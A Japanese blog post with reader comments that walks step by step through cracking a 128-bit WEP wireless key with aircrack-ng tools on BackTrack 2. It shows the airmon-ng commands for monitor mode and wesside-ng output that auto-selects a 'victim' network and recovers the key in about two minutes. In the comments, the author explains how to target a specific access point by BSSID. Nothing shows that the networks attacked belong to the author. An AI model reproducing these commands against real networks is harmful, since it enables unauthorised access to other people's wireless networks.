【無線LAN crack】 128bit WEPのCrack aircrack-ng 1.0-beta1 [Aircrack-ng]
128bit WEPの解読です
1CDLinuxのBackTrack 2にaircrack-ng 1.0-beta1をinstallしてます。
無線LANカードは富士通製 WLL4030-D50 (Atheros AR5212)です。
Atherosのチップはmonitorモードとパケットインジェクション(packet injection )をサポートしています。
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers
パケットインジェクションはブロードキャストパケットなどを自ら大量発生させる機能だと思います。
http://www.aircrack-ng.org/doku.php?id=newbie_guide#active_attacks
先ずはairmon-ngコマンドで無線LANカードをmonitorモードに変更します。
bt aircrack-ng # airmon-ng stop ath0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
bt aircrack-ng # airmon-ng start wifi0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
wesside-ngコマンドでWEPキーCrackを行います。
bt aircrack-ng # wesside-ng -i ath0
[14:39:45] Using mac 00:11:F5:E2:52:FE
[14:39:45] Looking for a victim...
(中略)
[14:41:46] Starting crack PID=15553
[14:41:49] WEP=000051577 (next crack at 60000) IV=ea:3c:00 (rate=407)
Key: XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX
[14:41:49] KEY=(XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX)
Owned in 2.08 minutes
[14:41:49] Dying...
前回64bit WEPをcrackしたときは30分以上掛かったのに、今回は128bitにも係わらず所要時間約2分です
ターゲットの指定はどうするのでしょうか?
自動的に指定するので。。。
by そーさい。 (2009-10-25 16:39)
wesside-ng -i ath0 -v00:11:22:33:44:55
-v でターゲット AP の BSSID を指定します。
by atc-500 (2009-10-25 20:58)
ありがとうございます!
おかげでできました!
そのような情報はどうやって調べたのですか?
コマンドのヘルプですか?
またはネットですか?
できれば教えてください!
by そーさい。 (2009-11-07 09:49)
そーさいさん、このサイトです。
http://www.aircrack-ng.org/doku.php?id=wesside-ng
http://www.aircrack-ng.org/doku.php
by atc-500 (2009-11-07 23:31)
英文のサイトですか!
その発想はなかったなぁ~
参考になりました! ありがとう!
by そーさい。 (2009-11-08 23:05)